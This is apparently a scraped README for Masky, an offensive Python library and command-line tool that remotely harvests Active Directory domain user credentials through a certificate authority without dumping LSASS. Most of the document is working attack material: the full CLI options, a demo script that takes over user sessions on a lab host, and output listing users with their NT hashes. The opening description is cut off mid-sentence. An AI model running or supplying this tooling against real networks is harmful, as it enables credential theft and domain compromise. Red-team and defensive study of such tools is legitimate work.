Masky – Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory

Masky is a

Masky also provides the options commonly offered by such tools (thread count, authentication mode, targets loaded from a file, etc.).

[Masky ASCII banner] v0.0.3

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to authenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    # The CA is given as "<CA host FQDN>\<CA name>", matching the -ca option of the CLI
    ca = "srv-01.sec.lab\\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least one user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop over the MaskyResult object to display hijacked users and retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generates the following output.

$> python3 ./masky_demo.py
Password:
Results from hostname: SRV-01
     - sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
     - sec\askywalker - 8928e0723012a8471c0084149c4e23b1
     - sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky/lib/results.py module to check the methods and attributes provided by these two classes.

Acknowledgments

  • Olivier Lyak for the Certipy tool and the associated articles
  • Will Schroeder and Lee Christensen for the Certify tool and the Certified Pre-Owned article
  • Dirk-jan for the PKINITtools and its ADCS NTLM relay article
  • SecureAuthCorp and the associated contributors for the Impacket library
  • Pixis for the tool Lsassy
  • Incognito tool and its Metasploit implementation
  • S3cur3Th1sSh1t for the tool SharpImpersonation and the associated article
  • McAfee for their article regarding the token impersonation techniques